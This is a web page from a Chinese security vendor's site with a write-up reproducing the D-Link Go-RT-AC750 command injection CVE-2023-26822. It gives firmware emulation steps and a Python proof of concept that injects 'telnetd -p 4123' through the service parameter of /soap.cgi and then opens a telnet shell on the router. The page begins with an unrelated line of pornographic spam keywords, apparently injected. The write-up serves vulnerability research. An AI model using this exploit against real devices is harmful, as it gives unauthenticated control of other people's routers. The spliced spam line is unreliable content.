亚洲精品v日韩精品-国产妇女乱码一区二区三区-HD免费看片,大粗又爽又黄少妇毛片免费,亚洲国产精品伦理,韩国三级bd高清中文字幕下载





首頁 產(chǎn)品與服務(wù) 解決方案 客戶案例 技術(shù)支持 合作發(fā)展 關(guān)于美創(chuàng) 用戶退出 合作商登錄 用戶登錄 申請?jiān)囉?/ul>

行業(yè)解決方案政府解決方案金融解決方案醫(yī)療解決方案教育解決方案能源解決方案物流交通解決方案

售后服務(wù) 文檔中心年度培訓(xùn)

渠道政策申請成為合作伙伴渠道專區(qū)

了解美創(chuàng) 公司介紹發(fā)展歷程企業(yè)文化權(quán)威認(rèn)可美創(chuàng)年刊
新聞中心公司動態(tài) 行業(yè)資訊安全研究
加入我們
聯(lián)系我們產(chǎn)品咨詢與試用總部與分支機(jī)構(gòu)

公司動態(tài) 行業(yè)資訊安全研究

熱門閱讀

美創(chuàng)科技打造縣域醫(yī)療災(zāi)備新標(biāo)桿｜神木市醫(yī)院 HIS 系統(tǒng)數(shù)據(jù)庫分鐘級切換演練實(shí)錄

2025-07-02

百萬罰單警示！DCAS助力金融機(jī)構(gòu)筑牢數(shù)據(jù)安全防線，實(shí)現(xiàn)監(jiān)管合規(guī)

2025-06-20

2025中國互聯(lián)網(wǎng)產(chǎn)業(yè)年會丨《中國互聯(lián)網(wǎng)產(chǎn)業(yè)綠色算力發(fā)展倡議》正式發(fā)布

2025-02-07

美創(chuàng)用戶專訪 | 精細(xì)化管理：醫(yī)療行業(yè)數(shù)據(jù)分類分級的策略與實(shí)踐

2025-01-10

容災(zāi)演練雙月報｜美創(chuàng)助力某特大型通信基礎(chǔ)設(shè)施央企順利完成多個核心系統(tǒng)異地容災(zāi)演練

2025-01-10

相關(guān)文章

每周安全速遞3?? | Aeza集團(tuán)因托管勒索軟件和信息竊取服務(wù)器而受到制裁

2025-07-04

每周安全速遞3?? | 俄羅斯法院釋放多名REvil勒索軟件團(tuán)伙成員引發(fā)爭議

2025-06-27

每周安全速遞3?? | 勒索團(tuán)伙聲稱竊取Freedman HealthCare敏感文件

2025-06-20

每周安全速遞3?? | Play勒索團(tuán)伙利用SimpleHelp漏洞實(shí)施雙重勒索

2025-06-13

每周安全速遞3?? | 維多利亞的秘密因網(wǎng)絡(luò)安全事件推遲2025年一季度財報發(fā)布

2025-06-06

D-Link Go-RT-AC750 命令注入漏洞（CVE-2023-26822）復(fù)現(xiàn)

發(fā)布時間：2023-05-26 閱讀次數(shù)： 775 次

漏洞概述

D-Link Go-RT-AC750是一款雙頻無線路由器。

D-Link Go-RT-AC750在固件版本為revA_v101b03中存在命令注入漏洞，漏洞編號：CVE-2023-26822。未經(jīng)授權(quán)的攻擊者可以請求 /soap.cgi 路由通過攜帶的參數(shù)進(jìn)行命令拼接，從而控制路由器。

環(huán)境搭建

1.FirmAE 工具安裝；首先拉取FirmAE 工具倉庫

git clone --recursive https://github.com/pr0v3rbs/FirmAE

運(yùn)行下載腳本；

cd FirmAE/./download.sh

運(yùn)行./install.sh進(jìn)行安裝

2.下載固件

本文模擬的是設(shè)備型號為Go-RT-AC750，固件版本：revA_v101b03

下載地址:

https://eu.dlink.com/uk/en/products/go-rt-ac750-wireless-ac750-dual-band-easy-

下載后得到GORTAC750_A1_FW_v101b03.bin固件文件

3.FirmAE工具初始化

在FirmAE工具目錄下執(zhí)行./init.sh進(jìn)行初始化

4.安裝binwalk

這里使用FirmAE工具目錄下的binwalk安裝程序進(jìn)行安裝

cd binwalk-2.3.3/

python3 setup.py install

5.模擬運(yùn)行固件
執(zhí)行如下命令對固件進(jìn)行解壓

binwalk -Me /root/GORTAC750_A1_FW_v101b03.bin --run-as=root

執(zhí)行如下命令來模擬運(yùn)行固件

sudo ./run.sh -r GORTAC750 /root/GORTAC750_A1_FW_v101b03.bin

使用瀏覽器訪問http://192.168.0.1，出現(xiàn)如下界面則表明成功模擬了一臺D-Link Go-RT-AC750路由器

漏洞復(fù)現(xiàn)

POC內(nèi)容如下：

ｆｒｏｍ socket import *ｆｒｏｍ os import *ｆｒｏｍ time import *
request = b"POST /soap.cgi?service=&&telnetd -p 4123& HTTP/1.1\r\n"request += b"Host: localhost:49152\r\n"request += b"Content-Type: text/xml\r\n"request += b"Content-Length: 88\r\n"request += b"SOAPAction: a#b\r\n\r\n" s = socket(AF_INET, SOCK_STREAM)s.connect((gethostbyname("192.168.0.1"), 49152))s.send(request) sleep(10)system('telnet 192.168.0.1 4123')